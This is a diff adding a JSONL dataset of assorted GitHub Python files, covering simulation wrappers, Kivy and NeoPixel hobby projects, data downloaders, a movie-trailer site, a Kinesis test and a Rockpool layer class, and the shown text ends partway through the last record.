diff --git "a/467.jsonl" "b/467.jsonl" new file mode 100644--- /dev/null +++ "b/467.jsonl" @@ -0,0 +1,2022 @@ +{"seq_id":"72196171283","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom pyomo.environ import *\nfrom pyomo.dae import *\nfrom kipet.library.ResultsObject import *\nfrom kipet.library.Simulator import *\nfrom kipet.library.PyomoSimulator import *\nfrom kipet.library.fe_factory import *\nimport warnings\nimport six\nimport sys\n\n__author__ = 'Michael Short' #: July 2018\n\nclass FESimulator(PyomoSimulator):\n def __init__(self, model):\n \"\"\"\n FESimulator class:\n \n This class is just an interface that allows the user of Kipet to easily implement the more general \n fe_factory class designed by David M. Thierry without having to re-write the model to fit those\n arguments. It takes in a standard Kipet/Pyomo model, rewrites it and calls fe_factory.\n More information on fe_factory is included in that class description.\n \n Args:\n model (ConcreteModel): The original Pyomo model created in the Kipet script\n \"\"\"\n super(FESimulator, self).__init__(model)\n self.p_sim = PyomoSimulator(model)\n self.c_sim = self.p_sim.model.clone()\n self.param_dict = {}\n self.param_name = \"P\"\n\n # check all parameters are fixed before simulating\n for p_sim_data in six.itervalues(self.p_sim.model.P):\n if not p_sim_data.fixed:\n raise RuntimeError('For simulation fix all parameters. Parameter {} is unfixed'.format(p_sim_data.cname()))\n\n #Build the parameter dictionary in the format that fe_factory uses \n for k,v in six.iteritems(self.p_sim.model.P):\n self.param_dict[\"P\",k] = v.value\n\n #Build the initial condition dictionary in the format that fe_factory uses\n self.ics_ = {} \n\n for t, k in six.iteritems(self.p_sim.model.Z):\n st = self.p_sim.model.start_time\n if t[0] == st:\n self.ics_['Z', t[1]] = k.value\n \n #Now to set the additional state values\n for t, v in six.iteritems(self.p_sim.model.X):\n if t[0] == st:\n self.ics_['X',t[1]] = v.value\n\n def call_fe_factory(self, inputs_sub=None, jump_states=None, jump_times=None, feed_times=None):#added for inclusion of discrete jumps CS\n \"\"\"\n call_fe_factory:\n \n This function applies all the inputs necessary for fe_factory to work, using Kipet syntax.\n Requires external inputs/dosing points to be specified with the following arguments.\n \n Args:\n inputs_sub (dict): dictionary of inputs \n jump_states (dict): dictionary of which variables and states are inputted and by how much\n jump_times (dict): dictionary in same form as jump_states with times of input\n feed_times (list): list of additional times needed, should be the same times as jump_times \n \"\"\"\n #added for inclusion of inputs of different kind CS\n self.inputs_sub=inputs_sub\n\n self.jump_times=jump_times\n self.jump_states=jump_states\n self.feed_times=feed_times\n \n init = fe_initialize(self.p_sim.model, self.c_sim,\n init_con=\"init_conditions_c\",\n param_name=self.param_name,\n param_values=self.param_dict,\n inputs_sub=self.inputs_sub)\n \n init.load_initial_conditions(init_cond=self.ics_)\n\n if jump_times!=None and jump_states!=None:\n init.load_discrete_jump(jump_states, jump_times, feed_times) #added for inclusion of discrete jumps\n init.run()\n","repo_name":"tkrumpol/KIPET","sub_path":"kipet/library/FESimulator.py","file_name":"FESimulator.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71235640403","text":"from kivy.app import App\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nimport kivy.uix.screenmanager\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.core.window import Window\n\n\nimport random\n\n#import string_sum\n\ndef run(error:str):\n if error == \"connection_error\":\n ErrorApp.run()\n\nclass ErrorApp(App):\n def build(self):\n sm = ScreenManager()\n\n sm.add_widget(ConnectionErrorScreen(name = \"screen\"))\n \n return sm\n\nclass ConnectionErrorScreen(Screen):\n def __init__(self, **kwargs):\n super(ConnectionErrorScreen, self).__init__(**kwargs)\n self.main_all_box = BoxLayout(orientation = \"vertical\")\n self.add_widget(self.main_all_box)\n\n self.banner = Button (border = (0, 0, 0, 0), size_hint = (1, None), height = Window.size[0] / 5.08, background_normal = 'images/banner.png', background_down = 'images/banner.png')\n self.main_all_box.add_widget(self.banner)\n\n text = \"\"\"\nConnection couldn't be found.\nTry these out:\n - Check your internet connection\n - Update your app\nIf these do not work, contact the developers.\n \"\"\"\n\n self.button = Button (border = (0, 0, 0, 0), size_hint = (1, 1), background_normal = 'images/paper_pink.png', background_down = 'images/paper_pink.png', text=text)\n self.main_all_box.add_widget(self.button)\n\n \n \n\nif __name__ == '__main__':\n ErrorApp().run()","repo_name":"Feluk6174/doxa_gui","sub_path":"error_screens.py","file_name":"error_screens.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12229695598","text":"# Simple test for NeoPixels on Raspberry Pi\n#from fusion import Fusion\nimport numpy as np\n#import utime as time\nimport time\nimport threading\nimport board\nimport neopixel\nimport paho.mqtt.client as mqtt\nfrom datetime import datetime\nfrom fastdtw import fastdtw\n# Choose an open pin connected to the Data In of the NeoPixel strip, i.e. board.D18\n# NeoPixels must be connected to D10, D12, D18 or D21 to work.\npixel_pin = board.D18\ndef time_diff(t2,t1):\n return t2-t1\n# The number of NeoPixels\nnum_pixels = 30\nnum_players = 3\n# The order of the pixel colors - RGB or GRB. Some NeoPixels have red and green reversed!\n# For RGBW NeoPixels, simply change the ORDER to RGBW or GRBW.\nORDER = neopixel.GRB\nMQTT_SERVER = \"localhost\"\n\npixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.2, auto_write=False,\n pixel_order=ORDER)\nlookup_player_id = ['player{}'.format(i) for i in range(num_players)]\nred = threading.Event()\nwin_size = 5\neuler = np.zeros((num_players,win_size,3))\nid_window = 0\nt=[0]*num_players\n#sensors = [Fusion(time_diff) for i in range(num_players)]\nn_calibration = 200\nidx = 0\naccel_data = np.zeros((num_players,win_size,3))\ndiff_total_buffer = np.zeros((num_players,win_size))\ndiff_total_smooth = np.zeros((num_players,win_size))\nRED_THRESHOLD = 8\n\n\ndef wheel(pos):\n # Input a value 0 to 255 to get a color value.\n # The colours are a transition r - g - b - back to r.\n if pos < 0 or pos > 255:\n r = g = b = 0\n elif pos < 85:\n r = int(pos * 3)\n g = int(255 - pos*3)\n b = 0\n elif pos < 170:\n pos -= 85\n r = int(255 - pos*3)\n g = 0\n b = int(pos*3)\n else:\n pos -= 170\n r = 0\n g = int(pos*3)\n b = int(255 - pos*3)\n return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r, g, b, 0)\n\n\ndef rainbow_cycle(wait):\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = (i * 256 // num_pixels) + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(wait)\n\ndef set(r,g,b):\n for i in range(num_pixels):\n pixels[i] = (r,g,b)\n #times.sleep(wait)\t\n\n\ndef subscribe_to_topics(client): \n for i in range(num_players):\n client.subscribe(\"theguy/player{}\".format(i))\n print(\"Subscribed to theguy/player{}\".format(i))\n \n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n subscribe_to_topics(client)\n\n \n# The callback for when a PUBLISH message is received from the server.\n#offset = np.zeros((num_players,n_calibration,9))\n\ndef get_euler_0():\n return euler[0,idx]\n\n\ndef get_euler_1():\n return euler[1,idx]\n\ndef calibrating():\n return idx < 200\n\nget_euler = [\nget_euler_0,\nget_euler_1\n]\n\ndef on_message(client, userdata, msg):\n global win_size, euler, id_window, t, sensors, num_players, idx, diff_total_smooth\n ########print(msg.topic+\" \"+str(msg.payload))\n\n source = str(msg.topic).split('/')\n #######print(source)\n topic,id_player = source\n\n\n topic = str(topic)\n id_player = int(lookup_player_id.index(id_player))\n values = [float(n) for n in str(msg.payload)[2:-1].split(',')]\n\n ##########print('Topic: {}, Player: {}, Value: {}'.format(topic,id_player,values))\n\n ts = values[-1]\n #sensors[id_player].calibrate(get_euler[id_player],calibrating)\n# sensors[id_player].update(values[:3],values[3:6],values[6:9],ts)\n# sensors[id_player].update_nomag(values[:3]-offset[:3],values[3:6]-offset[3:6],ts)\n\n# for i in range(num_players):\n# euler[i,idx%win_size,0] = sensors[i].roll\n# euler[i,idx%win_size,1] = sensors[i].pitch\n# euler[i,idx%win_size,2] = sensors[i].heading\n# #euler[i,idx] -= offset[id_player]\n\n accel_data[id_player,idx%win_size] = values[:3]\n\n if id_player == 0:\n accel_data[1,idx%win_size] = accel_data[1,(idx-1)%win_size]\n accel_data[2%win_size] = accel_data[2,(idx-1)%win_size]\n elif id_player == 1:\n accel_data[0,idx%win_size] = accel_data[0,(idx-1)%win_size]\n accel_data[1%win_size] = accel_data[2,(idx-1)%win_size]\n elif id_player == 2:\n accel_data[0,idx%win_size] = accel_data[0,(idx-1)%win_size]\n accel_data[1%win_size] = accel_data[1,(idx-1)%win_size]\n #print(np.round(euler,2))\n\n\n\n ###########print(\"\\nPlayer 1: {0:.2f}|{1:.2f}|{2:.2f} Player 2: {3:.2f}|{4:.2f}|{5:.2f}\".format(\n # accel_data[0,idx%win_size,0],\n # accel_data[0,idx%win_size,1],\n # accel_data[0,idx%win_size,2],\n # accel_data[1,idx%win_size,0],\n # accel_data[1,idx%win_size,1],\n # accel_data[1,idx%win_size,2]))\n\n\n diff_total_p1_x = np.abs(accel_data[0,idx%win_size,0] - accel_data[1,idx%win_size,0])\n diff_total_p1_y = np.abs(accel_data[0,idx%win_size,1] - accel_data[1,idx%win_size,1])\n diff_total_p1_z = np.abs(accel_data[0,idx%win_size,2] - accel_data[1,idx%win_size,2])\n diff_total_p1 = np.sqrt(diff_total_p1_x ** 2 + diff_total_p1_y ** 2 + diff_total_p1_z ** 2)\n\n diff_total_p2_x = np.abs(accel_data[0,idx%win_size,0] - accel_data[1,idx%win_size,0])\n diff_total_p2_y = np.abs(accel_data[0,idx%win_size,1] - accel_data[1,idx%win_size,1])\n diff_total_p2_z = np.abs(accel_data[0,idx%win_size,2] - accel_data[1,idx%win_size,2])\n diff_total_p2 = np.sqrt(diff_total_p2_x ** 2 + diff_total_p2_y ** 2 + diff_total_p2_z ** 2)\n\n diff_total_buffer[0,idx] = 0\n diff_total_buffer[1,idx] = diff_total_p1\n diff_total_buffer[2,idx] = diff_total_p2\n\n diff_total_smooth[0,idx] = 0\n diff_total_smooth[1,idx] = np.mean(diff_total_buffer[1], 0)\n diff_total_smooth[2,idx] = np.mean(diff_total_buffer[2], 0)\n\n # print(\"x: {}, y: {}, z: {}, tot: {}, sm: {}\".format(diff_total_x, diff_total_y, diff_total_z, diff_total, diff_total_smooth))\n \n\n\n\n# diff_total = np.linalg.norm(euler[0]-euler[1])\n# diff_current = np.linalg.norm(euler[0,idx%win_size]-euler[1,idx%win_size])\n\n# dtw_diff,_ = fastdtw(euler[0],euler[1])\n idx = (idx + 1) % win_size\n\n# print('Eucl. Distance Current: {}'.format(diff_current))\n# print('Eucl. Distance Window: {}'.format(diff_total))\n\n# print('Time Warped Distance: {}'.format(dtw_diff))\n\n if diff_total_smooth[1] > RED_THRESHOLD or diff_total_smooth[2] > RED_THRESHOLD:\n red.set()\n # print(\"Out of Sync\")\n else:\n # print(\"Clear\")\n red.clear()\n\n# with open('outfile.csv', 'a') as f:\n# f.write('{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{}\\n'.format(\n# sensors[0].ax,ESHOLD,\n# sensors[0].az,\n# sensors[0].gx,\n# sensors[0].gy,\n# sensors[0].gz,\n# sensors[0].mx,\n# sensors[0].my,\n# sensors[0].mz,\n# sensors[0].roll,\n# sensors[0].pitch,\n# sensors[0].heading,\n# sensors[1].ax,\n# sensors[1].ay,\n# sensors[1].az,\n# sensors[1].gx,\n# sensors[1].gy,\n# sensors[1].gz,\n# sensors[1].mx,\n# sensors[1].my,\n# sensors[1].mz,\n# sensors[1].roll,\n# sensors[1].pitch,\n# sensors[1].heading,\n# ))\n\n\n\n\n\ndef main(): \n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n \n client.connect(MQTT_SERVER, 1883, 60)\n \n # Blocking call that processes network traffic, dispatches callbacks and\n # handles reconnecting.\n # Other loop*() functions are available that give a threaded interface and a\n # manual interface.\n j = 0\n while True:\n # COMM\n client.loop(.1)\n \n\n # LED\n j += 20\n if j > 140:\n j = 0\n\n gradient = diff_total_smooth * 255 / RED_THRESHOLD\n if (gradient > 255): gradient = 255\n set(int(gradient), int(255 - gradient), 0)\n pixels.show()\n\n # if not red.isSet():\n # for i in range(num_pixels):\n # pixel_index = (i * 256 // num_pixels) + j\n # pixels[i] = wheel(pixel_index & 255)\n # pixels.show()\n # else:\n # set(255,0,0)\n # pixels.show()\n\n\n\n\nmain()\n","repo_name":"phildue/theguy","sub_path":"theguy_backend.py","file_name":"theguy_backend.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37630472604","text":"import requests\nfrom pathlib import Path\nimport datetime as dt\nfrom urllib.request import urlretrieve\nimport os\n\ndef download_file(url, file_name, ddir):\n ddir.mkdir(parents=True, exist_ok=True)\n \n # Join the directory with the filename\n file_path = ddir / file_name\n \n # Send a HTTP request to the url of the file we want to access\n response = requests.get(os.path.join(url, file_name), stream=True)\n\n # Check if the request was successful\n if response.status_code == 200:\n # If the request was successful, download the file\n with open(file_path, 'wb') as file:\n for chunk in response.iter_content(chunk_size=1024):\n file.write(chunk)\n print(f\"Downloaded the file. HTTP Response Code: {response.status_code}\")\n # urlretrieve(url, file_path)\n else:\n print(f\"Failed to download the file. HTTP Response Code: {response.status_code}\")\n\n# The URL of the file we want to download\nurl = 'http://tendral.com/TOPSv2/latest_composite/'\n\n# Get the current date\nnow = dt.datetime.now()\n\n# Subtract one day from the current date to get yesterday's date\nyesterday = now - dt.timedelta(days=1)\ntomorrow = now + dt.timedelta(days=1)\n\n\nfor d in [yesterday, now, tomorrow]:\n # Format the date\n formatted_date_1 = yesterday.strftime('%Y%m%d')\n formatted_date_2 = d.strftime('%Y%m%d')\n\n # The name we want to give to the downloaded file\n file_name = f'tops_compositem_{formatted_date_1}_{formatted_date_2}.nc'\n\n # Directory where the file should be downloaded\n ddir = Path('/home/hurricaneadm/data/tops/')\n # ddir = Path('/Users/mikesmith/data/tops/')\n\n download_file(url, file_name, ddir / d.strftime('%Y/%m'))\n","repo_name":"rucool/ioos_model_comparisons","sub_path":"scripts/harvest/grab_tops.py","file_name":"grab_tops.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71921252242","text":"# -*- coding: utf-8 -*-\n\"\"\"\n * Created by PyCharm.\n * Project: P1_Movie_Trailer\n * Author name: Iraquitan Cordeiro Filho\n * Author login: iraquitan\n * File: enterteinment_center\n * Date: 10/14/15\n * Time: 11:14 PM\n * To change this template use File | Settings | File Templates.\n\"\"\"\nimport fresh_tomatoes_custom\nimport media\n\n\n# Create various Movie's class instances\ntoy_story = media.Movie('Toy Story',\n \"A cowboy doll is profoundly threatened and jealous \"\n \"when a new spaceman figure supplants him as top toy \"\n \"in a boy's room.\",\n 1995,\n 'John Lasseter',\n 'https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg', # noqa\n 'https://www.youtube.com/watch?v=KYz2wyBy3kc')\n\navatar = media.Movie('Avatar',\n \"A paraplegic marine dispatched to the moon Pandora on a \"\n \"unique mission becomes torn between following his \"\n \"orders and protecting the world he feels is his home.\",\n 2009,\n 'James Cameron',\n 'https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg', # noqa\n 'https://www.youtube.com/watch?v=5PSNL1qE6VY')\n\nv_for_vendetta = media.Movie('V for Vendetta',\n \"Following world war, London is a police state \"\n \"occupied by a fascist government, and a \"\n \"vigilante known only as V (Hugo Weaving) uses \"\n \"terrorist tactics to fight the oppressors of \"\n \"the world in which he now lives.\",\n 2005,\n 'James McTeigue',\n 'https://upload.wikimedia.org/wikipedia/en/9/9f/Vforvendettamov.jpg', # noqa\n 'https://www.youtube.com/watch?v=lSA7mAHolAw')\n\nschool_of_rock = media.Movie('School of Rock',\n \"After being kicked out of a rock band, Dewey \"\n \"Finn becomes a substitute teacher of a strict \"\n \"elementary private school, only to try and turn \"\n \"it into a rock band.\",\n 2003,\n 'Richard Linklater',\n 'http://static.rogerebert.com/uploads/movie/movie_poster/school-of-rock-2003/large_cREN222Yw78zvSQ9bg17Y9QZS0c.jpg', # noqa\n 'https://www.youtube.com/watch?v=3PsUJFEBC74')\n\nhercules = media.Movie('Hercules',\n \"The son of the Greek Gods Zeus and Hera is stripped \"\n \"of his immortality as an infant and must become a \"\n \"true hero in order to reclaim it.\",\n 1995,\n 'Ron Clements and John Musker',\n 'https://31.media.tumblr.com/8fb4acba91d558615119d25c40789140/tumblr_inline_n571ften4m1rtf1yw.jpg', # noqa\n 'https://www.youtube.com/watch?v=NDMZHhcBHaQ')\n\ngarden_state = media.Movie('Garden State',\n \"A quietly troubled young man returns home for his \"\n \"mother's funeral after being estranged from his \"\n \"family for a decade.\",\n 2004,\n 'Zach Braff',\n 'http://www.masculinity-movies.com/wp-content/uploads/2012/04/600full-garden-state-poster.jpg', # noqa\n 'https://www.youtube.com/watch?v=u82n0e1mgmQ')\n\nhunger_games = media.Movie('Hunger Games',\n \"Katniss Everdeen voluntarily takes her younger \"\n \"sister's place in the Hunger Games, a televised \"\n \"fight to the death in which two teenagers from \"\n \"each of the twelve Districts of Panem are chosen \"\n \"at random to compete.\",\n 2012,\n 'Gary Ross',\n 'http://www.movieguide.org/wp-content/uploads/2012/06/98068201-0cc9-42ed-81ee-dcd480c4cba8.jpg', # noqa\n 'https://www.youtube.com/watch?v=PbA63a7H0bo')\n\nlotr_1 = media.Movie('LOTR 1 - The Fellowship of the Ring',\n \"A meek hobbit of the Shire and eight companions set out \"\n \"on a journey to Mount Doom to destroy the One Ring and \"\n \"the dark lord Sauron.\",\n 2001,\n 'Peter Jackson',\n 'http://www.movieposter.com/posters/archive/main/105/MPW-52979', # noqa\n 'https://www.youtube.com/watch?v=V75dMMIW2B4')\n\nlotr_2 = media.Movie('LOTR 2 - The Two Towers',\n \"While Frodo and Sam edge closer to Mordor with the help \"\n \"of the shifty Gollum, the divided fellowship makes a \"\n \"stand against Sauron's new ally, Saruman, and his \"\n \"hordes of Isengard.\",\n 2002,\n 'Peter Jackson',\n 'https://wtfbabe.files.wordpress.com/2012/11/two-towers-poster.jpg', # noqa\n 'https://www.youtube.com/watch?v=LbfMDwc4azU')\n\nlotr_3 = media.Movie('LOTR 3 - The Return of the King',\n \"Gandalf and Aragorn lead the World of Men against \"\n \"Sauron's army to draw his gaze from Frodo and Sam as \"\n \"they approach Mount Doom with the One Ring.\",\n 2003,\n 'Peter Jackson',\n 'http://sites.psu.edu/202d031/wp-content/uploads/sites/15365/2014/09/LOTR-King.jpg', # noqa\n 'https://www.youtube.com/watch?v=r5X-hFf6Bwo')\n\nmatrix = media.Movie('The Matrix',\n \"A computer hacker learns from mysterious rebels about \"\n \"the true nature of his reality and his role in the war \"\n \"against its controllers.\",\n 1999,\n 'The Wachowski Brothers',\n 'https://www.movieposter.com/posters/archive/main/9/A70-4902', # noqa\n 'https://www.youtube.com/watch?v=vKQi3bBA1y8')\n\nmovies = [toy_story, avatar, v_for_vendetta, school_of_rock, hercules,\n garden_state, hunger_games, lotr_1, lotr_2, lotr_3, matrix]\n\n# Use customized fresh_tomatoes_custom to create webpage with Movies instances\nfresh_tomatoes_custom.open_movies_page(movies)\n","repo_name":"iraquitan/udacity-fsnd-p0-movie-trailer","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":6748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70694657041","text":"#To check if any pokemon's number is a palindrome AND their base stat total is a palindrome. \n#Thanks to hoopsandhiphop on youtube for the idea\n\nimport requests\nimport progressbar\n\ndef palindrome(x):\n\treturn str(x) == str(x)[::-1]\n\ndef numformat(num):\n\tif 0 < num < 10:\n\t\treturn '00{0}'.format(num)\n\telif 9 < num < 100:\n\t\treturn '0{0}'.format(num)\n\telse:\n\t\treturn str(num)\n\nbaseurl = 'https://www.serebii.net/pokedex-sm/'\n\noutlines = []\nfor pokenum in progressbar.progressbar(range(810)):\n\tif palindrome(pokenum):\n\t\turl = baseurl + '{0}.shtml'.format(numformat(pokenum))\n\t\tpage = requests.get(url)\n\t\tlinestocheck = []\n\t\tfor line in page.text.split('\\n'):\n\t\t\tif 'Base Stats - Total:' in line:\n\t\t\t\tif line not in linestocheck:\t\t\t\t\n\t\t\t\t\tlinestocheck.append(line)\n\t\t\tif '' in line:\n\t\t\t\tname = line.split()[0][7:]\n\t\tusedbsts = []\n\t\tfor line in linestocheck:\n\t\t\tparsed = line.split()\n\t\t\tbst = parsed[-1][0:3]\n\t\t\tif bst not in usedbsts: \n\t\t\t\tusedbsts.append(bst)\n\t\t\t\tif palindrome(bst):\n\t\t\t\t\t\n\t\t\t\t\toutlines.append('{0} checks! Stats = {1}, number = {2}'.format(name, bst, pokenum))\nfor line in outlines:\n\tprint(line)\n","repo_name":"iammax/Fun-Projects","sub_path":"pokemon_palindrome.py","file_name":"pokemon_palindrome.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17445059521","text":"from machine import UART\nimport struct\nimport time\n\nuart = UART(1, 9600, tx=17, rx=16) # Initialize UART port.\n\ndef em_read():\n signed=True\n uart.write(b'\\xF8\\x04\\x00\\x00\\x00\\x0A\\x64\\x64') # Request for all parameters from the EM module.\n time.sleep(0.1)\n recv_data = uart.read()\n recv_data = recv_data[3:-2]\n data_length = int(len(recv_data) / 2)\n data_f = '>' + (('h' if signed else 'H') * data_length)\n return struct.unpack(data_f, recv_data)\n\ndef reset_energy(): # Resets 'kWh' data.\n uart.write(b'\\xF8\\x42\\xC2\\x41') \n","repo_name":"caijiayou/power","sub_path":"esp32/Lib/ssd1306.py","file_name":"ssd1306.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25450346120","text":"import helper\r\nimport pickle\r\n\r\ndef convert():\r\n raw_data = helper.read_data('./asset/test.txt')\r\n result = []\r\n file = open(\"result.txt\", \"w+b\")\r\n for i in raw_data:\r\n counter = 0\r\n for char in i:\r\n if char in '012':\r\n counter += 1\r\n if char == '1':\r\n result.append(counter)\r\n break\r\n pickle.dump(result,file)\r\n\r\ndef get_result():\r\n result = pickle.load(open(\"result.txt\", \"rb\"))\r\n return result\r\n\r\n\r\n\r\n","repo_name":"uygnef/COMP9318","sub_path":"my_solution/convert_test.py","file_name":"convert_test.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18415711143","text":"import unittest\nfrom unittest.mock import patch\n\n# Importar las funciones que se van a probar\nfrom stream_consumer_upper import get_shard_iterator\n\n\nclass TestStreamConsumer(unittest.TestCase):\n\n @patch('stream_consumer_upper.kinesis_client')\n def test_get_shard_iterator(self, mock_kinesis_client):\n stream_name = 'bollinger_stream'\n shard_id = 'shardId-000000000000'\n expected_iterator = 'example_shard_iterator'\n\n mock_kinesis_client.get_shard_iterator.return_value = {\n 'ShardIterator': expected_iterator}\n result = get_shard_iterator(stream_name, shard_id)\n\n self.assertEqual(result, expected_iterator)\n mock_kinesis_client.get_shard_iterator.assert_called_once_with(\n StreamName=stream_name,\n ShardId=shard_id,\n ShardIteratorType='TRIM_HORIZON'\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jchaves1406/Kinesis_deployment","sub_path":"test_stream_consumer.py","file_name":"test_stream_consumer.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40796384547","text":"\"\"\"\nLayer v1 base class for Rockpool layers\n\"\"\"\n\nfrom warnings import warn\nfrom abc import ABC, abstractmethod\nfrom functools import reduce\nfrom typing import Optional, Any, Tuple, Dict\nimport json\n\nimport numpy as np\n\nfrom rockpool.timeseries import TimeSeries, TSContinuous, TSEvent\nfrom rockpool.utilities.type_handling import to_scalar\n\n# - Configure exports\n__all__ = [\"Layer\"]\n\n\n# - Absolute tolerance, e.g. for comparing float values\ntol_abs = 1e-9\n\n\n### --- Implements the Layer abstract class\n\n\nclass Layer(ABC):\n \"\"\"\n Base class for Layers in rockpool\n\n This abstract class acts as a base class from which to derive subclasses that represent layers of neurons. As an abstract class, :py:class:`Layer` cannot be instantiated.\n \"\"\"\n\n def __init__(\n self,\n weights: np.ndarray,\n dt: float = 1.0,\n noise_std: float = 0.0,\n name: str = \"unnamed\",\n *args,\n **kwargs,\n ):\n \"\"\"\n Implement an abstract layer of neurons (no implementation, must be subclassed)\n\n :param ArrayLike[float] weights: Weight matrix for this layer. Indexed as [pre, post]\n :param float dt: Time-step used for evolving this layer. Default: 1\n :param float noise_std: Std. Dev. of state noise when evolving this layer. Default: 0. Defined as the expected std. dev. after 1s of integration time\n :param str name: Name of this layer. Default: 'unnamed'\n \"\"\"\n # - Call super-class init\n super().__init__(*args, **kwargs)\n\n # - Assign properties\n if name is None:\n self.name = \"unnamed\"\n else:\n self.name = name\n\n try:\n # Try this before enforcing with Numpy atleast to account for custom classes for weights\n self._size_in, self._size = weights.shape\n self._size_out = self._size\n self._weights = weights\n except Exception:\n weights = np.atleast_2d(weights)\n self._size_in, self._size = weights.shape\n self._size_out = self._size\n self._weights = weights\n\n # - Make sure `dt` is a float\n try:\n self._dt = float(dt)\n except TypeError:\n raise TypeError(self.start_print + \"`dt` must be a scalar.\")\n\n # Handle format of `noise_std`\n try:\n self.noise_std = float(noise_std)\n except TypeError:\n if noise_std is None:\n self.noise_std = 0.0\n else:\n raise TypeError(\n self.start_print + \"`noise_std` must be a scalar or `None`\"\n )\n\n self._timestep = 0\n\n ### --- Common methods\n\n def _determine_timesteps(\n self,\n ts_input: Optional[TimeSeries] = None,\n duration: Optional[float] = None,\n num_timesteps: Optional[int] = None,\n ) -> int:\n \"\"\"\n Determine how many time steps to evolve with the given input\n\n :param Optional[TimeSeries] ts_input: TxM or Tx1 time series of input signals for this layer\n :param Optional[float] duration: Duration of the desired evolution, in seconds. If not provided, ``num_timesteps`` or the duration of ``ts_input`` will be used to determine evolution time\n :param Optional[int] num_timesteps: Number of evolution time steps, in units of :py:attr:`.dt`. If not provided, ``duration`` or the duration of ``ts_input`` will be used to determine evolution time\n\n :return int: num_timesteps: Number of evolution time steps\n \"\"\"\n\n if num_timesteps is None:\n # - Determine ``num_timesteps``\n if duration is None:\n # - Determine duration\n if ts_input is None:\n raise TypeError(\n self.start_print\n + \"One of `num_timesteps`, `ts_input` or `duration` must be supplied.\"\n )\n\n if ts_input.periodic:\n # - Use duration of periodic TimeSeries, if possible\n duration = ts_input.duration\n\n else:\n # - Evolve until the end of the input TimeSeries\n duration = ts_input.t_stop - self.t\n if duration <= 0:\n raise ValueError(\n self.start_print\n + \"Cannot determine an appropriate evolution duration.\"\n + \" `ts_input` finishes before the current evolution time.\",\n )\n num_timesteps = int(np.floor((duration + tol_abs) / self.dt))\n else:\n if not isinstance(num_timesteps, int):\n raise TypeError(\n self.start_print + \"`num_timesteps` must be a non-negative integer.\"\n )\n elif num_timesteps < 0:\n raise ValueError(\n self.start_print + \"`num_timesteps` must be a non-negative integer.\"\n )\n\n return num_timesteps\n\n def _prepare_input(\n self,\n ts_input: Optional[TimeSeries] = None,\n duration: Optional[float] = None,\n num_timesteps: Optional[int] = None,\n ) -> Tuple[np.ndarray, np.ndarray, int]:\n \"\"\"\n Sample input, set up time base\n\n This function checks an input signal, and prepares a discretised time base according to the time step of the current layer\n\n :param Optional[TimeSeries] ts_input: :py:class:`.TimeSeries` of TxM or Tx1 Input signals for this layer\n :param Optional[float] duration: Duration of the desired evolution, in seconds. If not provided, then either ``num_timesteps`` or the duration of ``ts_input`` will define the evolution time\n :param Optional[int] num_timesteps: Integer number of evolution time steps, in units of ``.dt``. If not provided, then ``duration`` or the duration of ``ts_input`` will define the evolution time\n\n :return (ndarray, ndarray, int): (time_base, input_steps, num_timesteps)\n time_base: T1 Discretised time base for evolution\n input_raster (T1xN) Discretised input signal for layer\n num_timesteps: Actual number of evolution time steps, in units of ``.dt``\n \"\"\"\n assert (ts_input is None) or isinstance(\n ts_input, self.input_type\n ), \"The layer {} can only receive inputs of class {}\".format(\n self.name, str(self.input_type)\n )\n\n if self.input_type is TSContinuous:\n return self._prepare_input_continuous(ts_input, duration, num_timesteps)\n\n elif self.input_type is TSEvent:\n return self._prepare_input_events(ts_input, duration, num_timesteps)\n\n else:\n TypeError(\n \"Layer._prepare_input can only handle `TSContinuous` and `TSEvent` classes\"\n )\n\n def _prepare_input_continuous(\n self,\n ts_input: Optional[TSContinuous] = None,\n duration: Optional[float] = None,\n num_timesteps: Optional[int] = None,\n ) -> Tuple[np.ndarray, np.ndarray, int]:\n \"\"\"\n Sample input, set up time base\n\n This function checks an input signal, and prepares a discretised time base according to the time step of the current layer\n\n :param Optional[TSContinuous] ts_input: :py:class:`.TSContinuous` of TxM or Tx1 Input signals for this layer\n :param Optional[float] duration: Duration of the desired evolution, in seconds. If not provided, then either ``num_timesteps`` or the duration of ``ts_input`` will define the evolution time\n :param Optional[int] num_timesteps: Integer number of evolution time steps, in units of ``.dt``. If not provided, then ``duration`` or the duration of ``ts_input`` will define the evolution time\n\n :return (ndarray, ndarray, int): (time_base, 